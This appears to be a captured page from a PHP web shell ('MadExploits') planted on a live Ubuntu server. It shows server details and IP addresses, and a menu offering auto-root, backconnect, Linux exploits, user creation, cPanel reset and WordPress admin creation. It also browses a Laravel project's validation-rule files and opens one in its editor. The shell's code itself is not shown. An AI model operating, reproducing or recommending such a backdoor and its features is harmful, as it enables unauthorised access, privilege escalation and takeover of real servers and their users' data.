Linux ubuntu22 5.15.0-133-generic #144-Ubuntu SMP Fri Feb 7 20:47:38 UTC 2025 x86_64
nginx/1.18.0
: 128.199.27.159 | : 216.73.216.1
Cant Read [ /etc/named.conf ]
8.1.31
www-data
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
var /
www /
html /
sifaris /
app /
Rules /
[ HOME SHELL ]
Name
Size
Permission
Action
CategoryLanguageItemRule.php
757
B
-rw-rw-r--
MobileNumberNepalRule.php
1.4
KB
-rw-rw-r--
NepaliDateBSRule.php
618
B
-rw-rw-r--
PostLanguageItemRule.php
654
B
-rw-rw-r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : CategoryLanguageItemRule.php
<?php namespace App\Rules; use Closure; use Illuminate\Contracts\Validation\ValidationRule; class CategoryLanguageItemRule implements ValidationRule { private $name; public function __construct($name) { $this->name = $name; } /** * Run the validation rule. * * @param \Closure(string): \Illuminate\Translation\PotentiallyTranslatedString $fail */ public function validate(string $attribute, mixed $value, Closure $fail): void { $valid = true; foreach ($value as $item) { if (!trim($item['category_name'])) { $valid = false; break; } } if (!$valid) $fail($this->name . ' is required.'); } }
Close